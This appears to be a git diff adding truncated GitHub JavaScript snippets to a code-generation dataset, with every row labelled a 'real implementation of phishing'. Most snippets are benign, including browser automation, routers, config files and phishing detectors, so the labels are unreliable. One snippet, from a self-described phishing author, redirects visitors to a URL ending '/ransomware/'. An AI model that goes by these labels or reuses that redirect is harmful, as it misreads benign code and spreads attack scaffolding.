+ MailApp.sendEmail(recipient, subj",Javascript,gregkcarson/GoogleAppScriptSE,2025-05-22T22:01:03.220189,training
1385
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const express = require(""express"");
1386
+ const app = express();
1387
+ const http = require(""http"");
1388
+ const server = http.createServer(app);
1389
+ const puppeteer = require('puppeteer');
1390
+ const port = 9001;
1391
+ var browser;
1392
+ app.use(express.json())
1393
+ app.post('/bot/url', function(req, res) {
1394
+ res.setHeader('Content-Type', 'application/json');
1395
+ console.log(req.body);
1396
+ let url = req.body.url
1397
+ console.log(url);
1398
+ startBot(url)
1399
+ .then(() => {
1400
+ res.send({
1401
+ message: 'success',
1402
+ data: req.body
1403
+ })
1404
+ })
1405
+ .catch((err) => {
1406
+ res.send({
1407
+ message: 'failed',
1408
+ error: err
1409
+ })
1410
+ })
1411
+ })
1412
+ async function startBot(url) {
1413
+ console.log(browser);
1414
+ if(typeof browser !== 'undefined'){
1415
+ await browser.close()
1416
+ }
1417
+ const minimal_args = [
1418
+ '--autoplay-policy=user-gesture-required',
1419
+ '--disable-background-networking',
1420
+ '--disable-background-timer-throttling',
1421
+ '--disable-backgrounding-occluded-windows',
1422
+ '--disable-breakpad',
1423
+ '--disable-client-side-phishing-detection',
1424
+ '--disable-component-update',
1425
+ '--disable-default-apps',
1426
+ '--disable-dev-shm-usage',
1427
+ '--disable-domain-reliability',
1428
+ '--disable-extensions',
1429
+ '--disable-features=AudioServiceOutOfProcess',
1430
+ '--disable-hang-monitor',
1431
+ '--disable-ipc-flooding-protection',
1432
+ '--disable-notifications',
1433
+ '--disable-offer-store-unmasked-wallet-cards',
1434
+ '--disable-popup-blocking',
1435
+ '--disable-print-preview',
1436
+ '--disable-prompt-on-repost',
1437
+ '--disable-renderer-backgrounding',
1438
+ '--disable-setuid-sandbox',
1439
+ '--disable-speech-api',
1440
+ '--disable-sync',
1441
+ '--hide-scrollbars',
1442
+ '--ignore-gpu-blacklist',
1443
+ '--metrics-recording-only',
1444
+ '--mute-audio',
1445
+ '--no-default-browser-check',
1446
+ '--no-first-run',
1447
+ '--no-pings',
1448
+ '--no-sandbox',
1449
+ '--no-zygote',
1450
+ '--password-store=basic',
1451
+ '--use-gl=swiftshader',
1452
+ '--use-mock-keychain',
1453
+ ];
1454
+ console.log(""Launching Headless Browser::::::::::::"");
1455
+ browser = await puppeteer.launch({
1456
+ ",Javascript,arunjohn96/webndi,2025-05-22T22:01:03.383520,training
1457
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import React from 'react';
1458
+ import {
1459
+ Route,
1460
+ Switch
1461
+ } from 'react-router-dom';
1462
+
1463
+
1464
+ const isBrowser = typeof window !== ""undefined"" && typeof window.document !== ""undefined"";
1465
+ const dummy = () => {};
1466
+
1467
+
1468
+ const HelpTextPage = isBrowser? React.lazy(() => import(""./components/helpText"")): dummy;
1469
+ const WebhookPage = isBrowser? React.lazy(() => import(""./pages/guild_dashboard/server_view"")): dummy;
1470
+ const ManagerRootPage = isBrowser? React.lazy(() => import(""./pages/emote_manager/manager_root"")): dummy;
1471
+ const LoginPage = isBrowser? React.lazy(() => import(""./pages/login"")): dummy;
1472
+ const InvitePage = isBrowser? React.lazy(() => import(""./pages/invite"")): dummy;
1473
+ const PrivacyPolicy = isBrowser? React.lazy(() => import(""./pages/policy"")): dummy;
1474
+ const GuildCreatorPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_builder"")): dummy;
1475
+ const GuildSelectorPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_selector"")): dummy;
1476
+ const GuildStatusPage = isBrowser? React.lazy(() => import(""./pages/guild_builder/guild_status"")): dummy;
1477
+ const LicensePage = isBrowser? React.lazy(() => import(""./pages/licenses"")): dummy;
1478
+ const CommandPage = isBrowser? React.lazy(() => import(""./pages/commands"")): dummy;
1479
+ const BotAddedPage = isBrowser? React.lazy(() => import(""./pages/bot_added"")): dummy;
1480
+ const PremiumPage = isBrowser? React.lazy(() => import(""./pages/premium"")): dummy;
1481
+ const PublicPackSearchPage = isBrowser? React.lazy(() => import(""./pages/public_packs/search"")): dummy;
1482
+ const PublicPackPage = isBrowser? React.lazy(() => import(""./pages/public_packs/view"")): dummy;
1483
+ const PhishingPage = isBrowser? React.lazy(() => import(""./pages/phishing"")): dummy;
1484
+ const TermsPage = isBrowser? React.lazy(() => import(""./pages/terms"")): dummy;
1485
+
1486
+
1487
+ export const FullRouter = ({loggedIn, HomePage}) => {
1488
+ return (
1489
+ <React.Suspense fallback={<div>Loading Page...</div>}>
1490
+ {!loggedIn && <LoggedOutRouter HomePage={HomePage}/>}
1491
+ {loggedIn && <LoggedInRouter HomePage={H",Javascript,NQN-Discord/NQNFrontend,2025-05-22T22:01:03.529662,training
1492
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"const maxConfigItems = 600
1493
+ const maxPerType = 300
1494
+ const includeOriginalConfigs = 0
1495
+
1496
+ const subLinks = [
1497
+ ""https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/trojan.txt"",
1498
+ ""https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/ss.txt"",
1499
+ ""https://raw.githubusercontent.com/coldwater-10/V2Hub/main/Split/Base64/shadowsocks"",
1500
+ ""https://raw.githubusercontent.com/coldwater-10/V2Hub2/main/Split/Base64/vmess"",
1501
+ ""https://raw.githubusercontent.com/NiREvil/vless/main/sub/freedom""
1502
+ ]
1503
+ const cnfLinks = [
1504
+ ""https://raw.githubusercontent.com/coldwater-10/V2ray-Configs/main/Splitted-By-Protocol/vmess.txt"",
1505
+ ""https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/vmess_iran.txt"",
1506
+ ""https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/trojan_iran.txt"",
1507
+ ""https://raw.githubusercontent.com/coldwater-10/V2rayCollector/main/ss_iran.txt""
1508
+ ]
1509
+ const cleanIPLink = ""https://raw.githubusercontent.com/coldwater-10/clash_rules/main/List%20of%20clean%20IPs.txt""
1510
+ const operatorList = [""AST"", ""HWB"", ""IRC"", ""MBT"", ""MCI"", ""MKB"", ""PRS"", ""RTL"", ""SHT"", ""ZTL"", ""PIS"", ""DAT"", ""SAB"", ""ASR"", ""FAN"", ""ZTL"", ""SFR"", ""DID"", ""LAY"", ""MAH"", ""TAK"", ""PET"", ""AND"", ""RES"", ""AFR"", ""ARA"", ""SAM"", ""APT"", ""ALL"", ""PLUS"", ""TEST"", ""ENG"", ""FA"", ""IPV6"", ""IRCF"", ""ANTY""]
1511
+ const addressList = [""discord.com"", ""cloudflare.com"", ""nginx.com"", ""cdnjs.com"", ""vimeo.com"", ""networksolutions.com""]
1512
+ const fpList = [""chrome"", ""chrome"", ""chrome"", ""firefox"", ""safari"", ""edge"", ""ios"", ""android"", ""360"", ""qq"", ""random"", ""random""]
1513
+ const alpnList = [""http/1.1"", ""h2,http/1.1"", ""h2,http/1.1"", ""h2,http/1.1""]
1514
+ var cleanIPs = []
1515
+
1516
+ export default {
1517
+ async fetch(request) {
1518
+ var url = new URL(request.url)
1519
+ var pathParts = url.pathname.replace(/^\/|\/$/g, """").split(""/"")
1520
+ var type = pathParts[0].toLowerCase()
1521
+ if ([""sub"", ""clash""].includes(type)) {
1522
+ if (pathParts[1] !== undefined) {
1523
+ var operator = pathParts[1].toUppe",Javascript,NiREvil/workers-cloudflare,2025-05-22T22:01:03.663874,training
1524
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/* eslint-env node */
1525
+ module.exports = {
1526
+ test_page: 'tests/index.html?hidepassed',
1527
+ disable_watching: true,
1528
+ launch_in_ci: [
1529
+ 'Chrome',
1530
+ ],
1531
+ launch_in_dev: [
1532
+ 'Chrome',
1533
+ ],
1534
+ browser_args: {
1535
+ Chrome: [
1536
+ '--headless',
1537
+ '--no-sandbox',
1538
+ '--disable-gpu',
1539
+ '--disable-software-rasterizer',
1540
+ '--mute-audio',
1541
+ '--remote-debugging-port=0',
1542
+ '--window-size=1440,900',
1543
+
1544
+ // https://github.com/GoogleChrome/puppeteer/blob/v1.11.0/lib/Launcher.js#L36
1545
+ '--disable-background-networking',
1546
+ '--disable-background-timer-throttling',
1547
+ '--disable-backgrounding-occluded-windows',
1548
+ '--disable-breakpad',
1549
+ '--disable-client-side-phishing-detection',
1550
+ '--disable-default-apps',
1551
+ '--disable-dev-shm-usage',
1552
+ '--disable-extensions',
1553
+ '--disable-features=site-per-process',
1554
+ '--disable-hang-monitor',
1555
+ '--disable-ipc-flooding-protection',
1556
+ '--disable-popup-blocking',
1557
+ '--disable-prompt-on-repost',
1558
+ '--disable-renderer-backgrounding',
1559
+ '--disable-sync',
1560
+ '--disable-translate',
1561
+ '--enable-automation',
1562
+ '--metrics-recording-only',
1563
+ '--no-first-run',
1564
+ '--password-store=basic',
1565
+ '--safebrowsing-disable-auto-update',
1566
+ '--use-mock-keychain',
1567
+ ],
1568
+ },
1569
+ };
1570
+ ",Javascript,bitcoin-black-bcb/bcb-wallet,2025-05-22T22:01:03.841591,training
1571
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"//'use strict';
1572
+
1573
+ function appendMirr(data) {
1574
+ mirr = JSON.parse(data)[0];
1575
+ if(mirr.url) {
1576
+ var altelem = document.createElement(""h1"");
1577
+ altelem = '<br/><a style=""background: #2d2d2d !important; color:yellow !important; text-align: center !important; position: fixed !important; width: 100% !important; line-height: 1.5 !important; z-index: 9999 !important; display: block !important; visibility: visible !important; opacity: 1 !important;"" href=""'+mirr.url+'"">Try this working mirror instead</a>';
1578
+ var element = document.getElementById('mainwarn');
1579
+ element.innerHTML += altelem;
1580
+ }
1581
+ }
1582
+
1583
+ function newMirr(site, success) {
1584
+ if(site) {
1585
+ getAjax('https://onion.live/api/v2/public/mirrors?site='+site+'&max=1', '', success);
1586
+ }
1587
+ }
1588
+
1589
+ function handleResponse(message) {
1590
+ console.log(`Message from the background script: ${message.response}`);
1591
+ }
1592
+
1593
+ function handleError(error) {
1594
+ console.log(`Error: ${error}`);
1595
+ }
1596
+
1597
+ function getAjax(url, data, success) {
1598
+ var params = typeof data == 'string' ? data : Object.keys(data).map(
1599
+ function(k){ return encodeURIComponent(k) + '=' + encodeURIComponent(data[k]) }
1600
+ ).join('&');
1601
+ var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject(""Microsoft.XMLHTTP"");
1602
+ xhr.open('GET', url);
1603
+ xhr.onreadystatechange = function() {
1604
+ if (xhr.readyState>3 && xhr.status==200) { success(xhr.responseText); }
1605
+ if (xhr.readyState>3 && xhr.status!==200) { success(xhr.responseText); }
1606
+ };
1607
+ xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
1608
+ xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
1609
+ xhr.send(params);
1610
+ return xhr;
1611
+ }
1612
+
1613
+ function checkWorking(url, site) {
1614
+ var MrChecker = new XMLHttpRequest(),
1615
+ CheckThisUrl = ""http://""+url+""/"";
1616
+ MrChecker.open('get', CheckThisUrl, true);
1617
+ MrChecker.onreadystatechange = checkReadyState;
1618
+ function checkReadyState() {
1619
+ if (MrChecker.readyState === 4) {
1620
+ if (MrChecker.status >= 200 || MrChecker.status < 304) {
1621
+ var element = document.getElementById('mainwarn');
1622
+ if(element) {
1623
+ ",Javascript,OnionDotLive/onionliveplugin,2025-05-22T22:01:04.017163,training
1624
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"/*
1625
+ ####################################################################
1626
+ # s'abonner sur ma chaine youtube pour avoir plus de code phishing #
1627
+ # et hacking,il me donne le courage de faire les codes phishing #
1628
+ # #
1629
+ # subscribe on my youtube channel to have more phishing code #
1630
+ # and hacking, it gives me the courage to do the phishing codes #
1631
+ # #
1632
+ # ||~~ BY ~~ hakanonymos ~~|| #
1633
+ # #
1634
+ # #
1635
+ # #
1636
+ # skype et email : hakanonymos@hotmail.com #
1637
+ ####################################################################
1638
+ */
1639
+
1640
+
1641
+ var xScroll, yScroll, timerPoll, timerRedirect, timerClock;
1642
+
1643
+ function initRedirect(){
1644
+ if (typeof document.body.scrollTop != ""undefined""){ //IE,NS7,Moz
1645
+ xScroll = document.body.scrollLeft;
1646
+ yScroll = document.body.scrollTop;
1647
+
1648
+ clearInterval(timerPoll); //stop polling scroll move
1649
+ clearInterval(timerRedirect); //stop timed redirect
1650
+
1651
+ timerPoll = setInterval(""pollActivity()"",1); //poll scrolling votre site de redrection 10000 = 10 seconde
1652
+ timerRedirect = setInterval(""location.href='https://panafricaine.com/ransomware/'"",300 0000); //temps de redirection
1653
+
1654
+
1655
+ }
1656
+ else if (typeof window.pageYOffset != ""undefined""){ //other browsers that support pageYOffset/pageXOffset instead
1657
+ ",Javascript,hakanonymos/chromeKeylogger,2025-05-22T22:01:04.152105,training
1658
+ code_generation,phishing in Javascript,Real implementation of phishing in Javascript fetched from GitHub.,"import { useEffect, useState } from ""react"";
1659
+
1660
+ import Navbar from ""./components/Navbar/Navbar"";
1661
+ import Breadcrumbs from ""./components/Breadcrumbs/Breadcrumbs"";
1662
+ import ProductDetails from ""./components/ProductDetails/ProductDetails"";
1663
+ import ProductCarousel from ""./components/ProductCarousel/ProductCarousel"";
1664
+
1665
+ import Swal from ""sweetalert2"";
1666
+
1667
+ import ""./App.css"";
1668
+
1669
+ const App = () => {
1670
+ const [darkMode, setDarkMode] = useState(false);
1671
+
1672
+ const toggleDarkMode = () => setDarkMode(prevState => !prevState);
1673
+
1674
+ useEffect(() => {
1675
+ Swal.fire({
1676
+ title: ""¡Atención!"",
1677
+ text: ""Esta web NO es el sitio oficial de Mercado Libre, se trata de un challenge de Frontend, no es un intento de phishing hacia los usuarios que la visitan."",
1678
+ icon: ""warning"",
1679
+ confirmButtonText: ""¡Entendido!"",
1680
+ confirmButtonColor: ""#3484fa"",
1681
+ backdrop: ""rgba(0, 0, 0, 0.8)"",
1682
+ });
1683
+ }, []);
1684
+
1685
+ return (
1686
+ <>
1687
+ <header className={darkMode ? ""dark-mode"" : """"}>
1688
+ <Navbar darkMode={darkMode} toggleDarkMode={toggleDarkMode} />
1689
+ </header>
1690
+
1691
+ <main className={darkMode ? ""dark-mode"" : """"}>
1692
+ <Breadcrumbs />
1693
+ <ProductDetails />
1694
+ <ProductCarousel />
1695
+ </main>
1696
+
1697
+ <footer className={darkMode ? ""dark-mode"" : """"}>
1698
+ Desarrollado por&nbsp;
1699
+ <a
1700
+ href=""https://gastonperez.ar/""
1701
+ target=""_blank""
1702
+ rel=""noreferrer""
1703
+ >
1704
+ Gast&oacute;n P&eacute;rez
1705
+ </a>
1706
+ <p>
1707
+ ATENCIÓN: Esta web se trata de un&nbsp;
1708
+ <a
1709
+ href=""https://github.com/goncy/mercadolibre-details-challenge""
1710
+ target=""_blank""
1711
+ rel=""noreferrer""
1712
+ >
1713
+ challenge
1714
+ </a>
1715
+ , no es un intento de phishing hacia los usuarios que la
1716
+ visitan.
1717
+ </p>
1718
+ </footer>
1719
+ </>
1720
+ );
1721
+ };
1722
+
1723
+ export default App;
1724
+ ",Javascript,GastonPerez97/mercadolibre-details-challenge,2025-05-22T22:01:04.271013,training
code_dataset_20250522_220104.json ADDED
@@ -0,0 +1,302 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [
2
+ {
3
+ "task":"code_generation",
4
+ "problem_title":"phishing in Javascript",
5
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
6
+ "sample_solution":"\/* Author: Selvahini Kamalarajan \r\nDate: December 5, 2023 \r\nFile Name: script \r\nDescription: Informational website about the implications of privacy and information technology usage *\/\r\n\r\nfunction phishing() {\r\n \/\/ Function to display correct answer for phishing email question\r\n var question = document.quiz2.question.value;\r\n\r\n if (question == \"yes\") {\r\n document.getElementById(\"message\").innerHTML = \"Correct! This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate.\";\r\n }\r\n\r\n if (question == \"no\") {\r\n document.getElementById(\"message\").innerHTML = \"Incorrect. This is a spoof email coming from a fake sender address (i.e. 'myuniversity.edu') and redirects the user to a bogus page that appears to be legitimate. Your privacy can be compromised due to malicious script activities.\";\r\n }\r\n document.getElementById(\"after_submit\").style.visibility = \"visible\"; \/\/Set element visibility to visible \r\n}\r\n\r\nfunction check() {\r\n \/\/ Function to check answers for Privacy Policy Question\r\n var question = document.quiz.question.value;\r\n\r\n \/\/ Output message and picture if user answers yes\/no\r\n if (question == \"yes\") {\r\n document.getElementById(\"message\").innerHTML = \"Nice! You are one of 9% of people who read privacy policies often.\";\r\n document.getElementById(\"picture\").src = \"policy.png\";\r\n }\r\n\r\n if (question == \"no\") {\r\n document.getElementById(\"message\").innerHTML = \"Just like you, 91% of consumers accept the terms and conditions without reading them.\";\r\n document.getElementById(\"picture\").src = \"policies-stats.jpg\";\r\n }\r\n document.getElementById(\"after_submit\").style.visibility = \"visible\";\r\n}\r\n\r\nfunction checkAns() {\r\n \/\/ Function to check answers for quiz \r\n var correctAns = [\"b\", \"b\", \"a\", \"d\", \"b\", \"d\", \"b\", \"b\", \"c\", \"d\"]; \r\n\r\n var correct = 0;\r\n \r\n var questions = [document.quiz.q1.value, document.quiz.q2.value, document.quiz.q3.value, documen",
7
+ "language":"Javascript",
8
+ "repo_name":"selvxhini-10\/PersonalPrivacyWebsite",
9
+ "timestamp":"2025-05-22T22:01:00.115247",
10
+ "split":"training"
11
+ },
12
+ {
13
+ "task":"code_generation",
14
+ "problem_title":"phishing in Javascript",
15
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
16
+ "sample_solution":"\/\/\n\/******************************************************************************\n * user.js *\n * https:\/\/github.com\/pyllyukko\/user.js *\n ******************************************************************************\/\n\n\/******************************************************************************\n * SECTION: HTML5 \/ APIs \/ DOM *\n ******************************************************************************\/\n\n\/\/ PREF: Disable Service Workers\n\/\/ https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/Worker\n\/\/ https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/API\/ServiceWorker_API\n\/\/ https:\/\/wiki.mozilla.org\/Firefox\/Push_Notifications#Service_Workers\n\/\/ NOTICE: Disabling ServiceWorkers breaks functionality on some sites (Google Street View...)\n\/\/ NOTICE: Disabling ServiceWorkers breaks Firefox Sync\n\/\/ Unknown security implications\n\/\/ CVE-2016-5259, CVE-2016-2812, CVE-2016-1949, CVE-2016-5287 (fixed)\nuser_pref(\"dom.serviceWorkers.enabled\",\t\t\t\tfalse);\n\n\/\/ PREF: Disable web notifications\n\/\/ https:\/\/support.mozilla.org\/en-US\/questions\/1140439\nuser_pref(\"dom.webnotifications.enabled\",\t\t\tfalse);\n\n\/\/ PREF: Disable DOM timing API\n\/\/ https:\/\/wiki.mozilla.org\/Security\/Reviews\/Firefox\/NavigationTimingAPI\n\/\/ https:\/\/www.w3.org\/TR\/navigation-timing\/#privacy\n\/\/ NOTICE: Disabling DOM timing API breaks item pages in AliExpress (https:\/\/github.com\/pyllyukko\/user.js\/issues\/561)\nuser_pref(\"dom.enable_performance\",\t\t\t\tfalse);\n\n\/\/ PREF: Disable resource timing API\n\/\/ https:\/\/www.w3.org\/TR\/resource-timing\/#privacy-security\n\/\/ NOTICE: Disabling resource timing API breaks some DDoS protection pages (Cloudflare)\nuser_pref(\"dom.enable_resource_timing\",\t\t\t\tfalse);\n\n\/\/ PREF: Make sure the User Timing API does not provide a new high resolution timestamp\n\/\/ https:\/\/trac.torproject.org\/projects\/tor\/ticket\/16336\n\/\/ https:\/\/www.w3.org\/TR\/2013\/REC-user-timing-2",
17
+ "language":"Javascript",
18
+ "repo_name":"pyllyukko\/user.js",
19
+ "timestamp":"2025-05-22T22:01:00.249678",
20
+ "split":"training"
21
+ },
22
+ {
23
+ "task":"code_generation",
24
+ "problem_title":"phishing in Javascript",
25
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
26
+ "sample_solution":"export class PhishingDetector {\n constructor() {\n \/\/ No need to check for ai.languageModel here\n \/\/ We'll handle capability checks when we use the model\n }\n\n async calculateScore(emailContent) {\n try {\n \/\/ Log emailContent for debugging\n console.log('Email content received:', emailContent);\n\n const features = this.analyzeEmailFeatures(emailContent);\n\n \/\/ Check if the language model is available\n const capabilities = await ai.languageModel.capabilities();\n\n if (capabilities.available !== \"readily\") {\n console.warn('Language model is not readily available');\n\n if (capabilities.consent === \"granted\") {\n console.log('Consent already granted.');\n } else if (capabilities.consent === \"requirable\") {\n \/\/ Request user consent\n const consentResult = await ai.languageModel.requestConsent();\n if (!consentResult) {\n console.warn('User did not grant consent');\n return 50; \/\/ Return a default score or handle accordingly\n } else {\n console.log('User granted consent.');\n }\n } else {\n console.warn('Consent is not available.');\n return 50; \/\/ Return a default score or handle accordingly\n }\n }\n\n \/\/ Generate the prompt\n const prompt = `\n \nInstructions:\n- Considering the above information, assign a phishing likelihood score and provide a detailed explanation.\n- Use English and Arabic numerals.\n- Return the result in the format \"The score is the following: X\", where X is a number between 0 and 100.\nAnalyze this email for phishing indicators and provide a response in the following format:\n\nThe score is the following: X\n\nThe explanation is: [Your detailed analysis here]\nEnd of explanation.\n\nConsider these factors:\n- Urgency or pressure tactics\n- Grammar and spelling errors\n- Suspicious links or attachments\n- Requests for sensitive information\n- Mismatched or fake sender addresses\n- Time sent ",
27
+ "language":"Javascript",
28
+ "repo_name":"Dalosuuu\/GmailPhishGuardian_AI",
29
+ "timestamp":"2025-05-22T22:01:00.434292",
30
+ "split":"training"
31
+ },
32
+ {
33
+ "task":"code_generation",
34
+ "problem_title":"phishing in Javascript",
35
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
36
+ "sample_solution":"'use strict'\n\nconst chromeLauncher = require('chrome-launcher')\nconst path = require('path')\n\n\/\/ Borrow from here:\n\/\/ https:\/\/github.com\/GoogleChrome\/puppeteer\/blob\/master\/lib\/Launcher.js#L30\nconst DEFAULT_ARGS = [\n '--disable-background-networking',\n '--disable-background-timer-throttling',\n '--disable-client-side-phishing-detection',\n '--disable-default-apps',\n '--disable-hang-monitor',\n '--disable-popup-blocking',\n '--disable-prompt-on-repost',\n '--disable-sync',\n '--enable-automation',\n '--enable-devtools-experiments',\n '--metrics-recording-only',\n '--no-first-run',\n '--password-store=basic',\n '--safebrowsing-disable-auto-update',\n '--use-mock-keychain',\n]\n\n\/\/ borrow from: http:\/\/qiita.com\/saekis\/items\/c2b41cd8940923863791\nfunction escapeHtml (string) {\n if (typeof string !== 'string') {\n return string\n }\n return string.replace(\/[&'`\"<>]\/g, function (match) {\n return {\n '&': '&amp;',\n '\\'': '&#x27;',\n '`': '&#x60;',\n '\"': '&quot;',\n '<': '&lt;',\n '>': '&gt;',\n }[match]\n })\n}\n\nfunction escapeSingleQuote (string) {\n if (typeof string !== 'string') {\n return string\n }\n return string.replace(\/'\/g, '\\\\\\'')\n}\n\nfunction escapeNewLine (string) {\n return string.replace(\/\\r?\\n\/g, '\\\\n')\n}\n\nasync function createChromeLauncher (startingUrl, options) {\n const flags = [].concat(DEFAULT_ARGS)\n let chromeInstance\n\n \/\/ Lighthouse adds '--disable-setuid-sandbox' flag automatically.\n \/\/ The flag causes an error on linux when staring headless chrome.\n \/\/ '--no-sandbox' suppresses an error caused by '--disable-setuid-sandbox'.\n if (process.platform === 'linux') {\n flags.push('--no-sandbox')\n }\n if (!options.visible) {\n flags.push('--headless')\n flags.push('--hide-scrollbars')\n flags.push('--mute-audio')\n }\n if (options.chromeFlags && Array.isArray(options.chromeFlags)) {\n options.chromeFlags.forEach(f => {\n if (f.indexOf('--') === -1) {\n throw new Error('An item of chromFlags option",
37
+ "language":"Javascript",
38
+ "repo_name":"OnetapInc\/chromy",
39
+ "timestamp":"2025-05-22T22:01:00.573851",
40
+ "split":"training"
41
+ },
42
+ {
43
+ "task":"code_generation",
44
+ "problem_title":"phishing in Javascript",
45
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
46
+ "sample_solution":"\/\/ eslint-disable-next-line no-undef\ndocute.init({\n debug: true,\n title: 'Spam Scanner',\n repo: 'spamscanner\/spamscanner',\n 'edit-link': 'https:\/\/github.com\/spamscanner\/spamscanner\/tree\/master\/',\n twitter: 'niftylettuce',\n nav: {\n default: [\n {\n title:\n 'The best anti-spam, email filtering, and phishing prevention service.',\n path: '\/'\n }\n ]\n },\n \/\/ eslint-disable-next-line no-undef\n plugins: [docuteEmojify()]\n});\n",
47
+ "language":"Javascript",
48
+ "repo_name":"spamscanner\/spamscanner",
49
+ "timestamp":"2025-05-22T22:01:00.710474",
50
+ "split":"training"
51
+ },
52
+ {
53
+ "task":"code_generation",
54
+ "problem_title":"phishing in Javascript",
55
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
56
+ "sample_solution":"\n\n\/\/ this is the code which will be injected into a given page...\nvar config = {\n apiKey: \"AIzaSyD1FfiwIWzbbn0rhqQg6ZF2KzVBOiqU7oQ\",\n authDomain: \"phish-ai-production.firebaseapp.com\",\n databaseURL: \"https:\/\/phish-ai-production.firebaseio.com\",\n projectId: \"phish-ai-production\",\n storageBucket: \"gs:\/\/phish-ai-production.appspot.com\/\",\n messagingSenderId: \"976092427021\"\n};\nfirebase.initializeApp(config);\nvar db = firebase.firestore();\n\n\nfunction open_options_page() {\n chrome.tabs.create({'url': \"\/options.html\" } )\n};\n\nfunction open_demo_page() {\n chrome.tabs.create({'url': \"https:\/\/www.phish.ai\/request-a-demo\" } )\n};\n\nfunction restore_popup() {\n chrome.storage.local.get({\n idnEnable: true,\n aiEnable: true\n }, function(items) {\n if (!items.aiEnable) {\n document.getElementById('zero_day_disabled').style.display = \"\"\n }\n if (!items.idnEnable) {\n document.getElementById('idn_disabled').style.display = \"\"\n }\n var bg = chrome.extension.getBackgroundPage();\n var query = {active: true, currentWindow: true};\n chrome.tabs.query(query, function callback(tabs) {\n if (items.idnEnable) {\n var currentTab = tabs[0]; \/\/ there will be only one in this array\n var hostname = bg.extractHostname(currentTab.url);\n var domain = document.getElementById('domain');\n var idn_status = document.getElementById('idn_status');\n if (bg.isDomainIDN(hostname)) {\n domain.className = 'badge badge-danger';\n idn_status.className = 'badge badge-danger';\n idn_status.innerHTML = 'IDN Detected';\n }\n domain.innerHTML = hostname;\n }\n\n if (items.aiEnable) {\n if (currentTab.id in bg.tabMalicious) {\n var zero_day = document.getElementById('zero_day');\n var ta",
57
+ "language":"Javascript",
58
+ "repo_name":"phishai\/phish-protect",
59
+ "timestamp":"2025-05-22T22:01:00.830022",
60
+ "split":"training"
61
+ },
62
+ {
63
+ "task":"code_generation",
64
+ "problem_title":"phishing in Javascript",
65
+ "problem_description":"Real implementation of phishing in Javascript fetched from GitHub.",
66
+ "sample_solution":"respecConfig.localBiblio = {\n\t\"aicaptcha\": {\n\t\t\"title\": \"aiCaptcha: Using AI to beat CAPTCHA and post comment spam\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [\"Casey Chesnut\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.brains-n-brawn.com\/default.aspx?vDir=aicaptcha\"\n\t},\n\n \"able-gamers\": {\n \"title\": \"Thought On Accessibility and VR\",\n \"date\": \"March, 2017\",\n \"authors\": [\"AJ Ryan\"],\n \"editors\": [],\n \"etAl\": false,\n \"publisher\": \"\",\n \"href\": \"https:\/\/ablegamers.org\/thoughts-on-accessibility-and-vr\/\"\n },\n\n\t\"antiphishing\": {\n\t\t\"title\": \"Phishing Activity Trends Report\",\n\t\t\"date\": \"July, 2005\",\n\t\t\"authors\": [],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"Anti-Phishing Working Group\",\n\t\t\"href\": \"http:\/\/antiphishing.org\/APWG_Phishing_Activity_Report_Jul_05.pdf\"\n\t},\n\t\"breaking\": {\n\t\t\"title\": \"Breaking CAPTCHAs Without Using OCR\",\n\t\t\"date\": \"\",\n\t\t\"authors\": [\"Howard Yeend\"],\n\t\t\"editors\": [],\n\t\t\"etAl\": false,\n\t\t\"publisher\": \"\",\n\t\t\"href\": \"http:\/\/www.cs.berkeley.edu\/%7Emori\/gimpy\/gimpy.html\"\n\t},\n\t\"breakingocr\": {\n\t\t\"title\": \"Breaking CAPTCHAs Without Using OCR\",\n\t\t\"date\": \"\",\n\t\t\"authors\": 